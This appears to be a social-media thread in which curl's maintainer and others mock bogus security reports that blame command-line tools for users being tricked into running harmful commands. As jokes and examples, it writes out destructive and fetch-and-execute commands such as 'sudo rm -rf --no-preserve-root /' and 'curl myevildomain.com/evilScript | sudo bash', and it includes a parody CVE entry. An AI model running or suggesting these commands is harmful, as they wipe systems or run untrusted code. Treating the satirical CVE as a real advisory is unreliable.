If you can trick a user to run a command tool in a way that ends up causing the user problems, that is not a security problem in that tool.
Just saying. In case you're thinking of submitting such a report about a command line tool in your toolbox.
But surely no sane person would. Right? Right?
The latest incarnation of this is someone saying that curl can be used to download a ".curlrc" into your $HOME and then curl might do bad things in subsequent invocations.
The first step is "just" to trick a user to run a curl command line doing the bad.
... if you can trick a user into running an arbitrary command, you can of course do so much more harm than just this.
@bagder It seems insane that anyone would lay blame for such occurrences at your feet but I'm sure you're received any number of these and more.
@thedoctor we get different variations of this reported with some interval, yes
@bagder I pasted `rm *` from some seedy-looking howto site, and now all my files are gone!
Can I use curl to get them back?!!
@bagder so what was it this time?
CVE-2025-6978513: Arbitrary code execution in bash
Severity: 10
When opening bash and inputting a command provided by a malicious third party, arbitrary commands can be executed. This can, among other things, be used for privilege escalation, creation of backdoors, and downloading of malware.
Proof of concept:
- Open bash
- Run "sudo rm -rf --no-preserve-root /"
@bagder Not having high hopes this will help a lot, but you could add to the program guidelines explicitly that those types are not valid reports.
curl | bash - not valid!
curl -o /etc/shadow - not valid!
@faker We already have this pretty explicitly documented to not be a security problem:
A creative, misleading or funny looking command line is not a security problem. The curl command line tool takes options and URLs on the command line and if an attacker can trick the user to run a specifically crafted curl command line, all bets are off. Such an attacker can just as well have the user run a much worse command that can do something fatal (like `sudo rm -rf /`).
@bagder Sorry, you have more words for that than I have.
Layer-8 issues (behind the keyboard) cannot all be solved by software.
@bagder A variant of Raymond Chen's "other side of airtight hatchway" problem? :)
@bagder oh, I didn't even know about https://curl.se/dev/vuln-disclosure.html
I meant to add it here: https://hackerone.com/curl
Or link to your vulnerability disclosure policy from there.
Again, not holding my breath that people who report such "bugs" read those guidelines anyway...
@faker thanks for pointing this out, I added a link to the policy page now from the hackerone submission page.
@bagder Where's my "rm -rf --no-preserve-root /" RCE-through-user bounty!???
@bagder I can't imagine dead ass submitting a report going "this tool that downloads remote files has a security vulnerability. People can download remote files with it and overwrite their existing files" like
tech news headline: NEW RCE IN CURL!!!1!!!
"If a user executes the command curl myevildomain.com/evilScript | sudo bash, hackers will take control of the user's system"